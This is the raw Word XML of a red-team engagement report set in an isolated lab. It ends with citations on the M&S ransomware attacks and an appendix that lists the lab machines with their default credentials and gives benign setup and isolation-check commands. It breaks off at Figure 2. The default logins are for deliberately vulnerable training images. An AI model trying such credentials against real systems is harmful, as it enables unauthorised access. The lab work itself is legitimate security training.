      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">periculo.co.uk</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A52390A" w14:textId="599F5F40" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Specops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Software / White, M. (2025) ‘M&amp;S ransomware hack: service desk &amp; Active Directory security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>lessons’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">specopssoft.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F62E94E" w14:textId="681370C4" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The Guardian (2025) ‘Four arrested over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Marks &amp; Spencer, Co-op and Harrods’, 10 July. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">theguardian.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D49C6" w14:textId="323257FD" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The Hacker News (2025) ‘Scattered Spider behind cyberattacks on M&amp;S and Co-op, causing up to $592M in damages’, 21 June. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">thehackernews.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D24151B" w14:textId="60E9AF61" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001D2F79">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">[10] </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UK Government (1990) Computer Misuse Act 1990. Available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">legislation.gov.uk</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627579E3" w14:textId="25C1B251" w:rsidR="005F5D4B" w:rsidRDefault="005F5D4B" w:rsidP="00BD02D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B7FBF1" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00BD02D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71307492" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00BD02D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C108166" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix — Evidence Package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040EDFC" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Red Team Engagement — ABCD Ltd — 20 Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F6C4C6" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>How to use: for each figure below, copy the command, run it on the machine named in “Run on”, then screenshot the result and paste it into the dashed box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E7ACCE" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:before="240" w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD429D" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali (operator) — 192.168.56.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13514A78" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Metasploitable2 — 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A2915F" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OWASP BWA (web server) — 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AFB0B1" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Windows 7 — 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1A6591" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Logins: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ·</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  OWASP BWA console = root / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>owaspbwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ·</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  DVWA in browser = admin / admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B761C3" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>First, on Kali, make an evidence folder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E59DF" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p ~/engagement/evidence &amp;&amp; cd ~/engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A864C" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:before="200" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243ED3A0" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:before="240" w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Part 1 — Isolation &amp; Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19495594" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figure 1 — Kali IP address &amp; routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D64C7F0" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E570C5F" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali is 192.168.56.104 and its routing table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C82453F" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA74638" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> route</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="24C92D5F" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="683DC55B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B07EA5B" wp14:editId="19B6625A">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="101" name="Figure 1 - img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7"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54DE4BE9" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F12FE89" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 2 — Proof of isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBC641" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB18873" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The internet ping FAILS — that is the point (the lab has no external route).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC7FA4" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>ping -c3 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D498495" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Expected: 100% packet loss / network unreachable. Screenshot the failure.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="5B959529" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="586FFEFA" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04E7E081" wp14:editId="4E9C651E">
                  <wp:extent cx="5588000" cy="3143250"/>
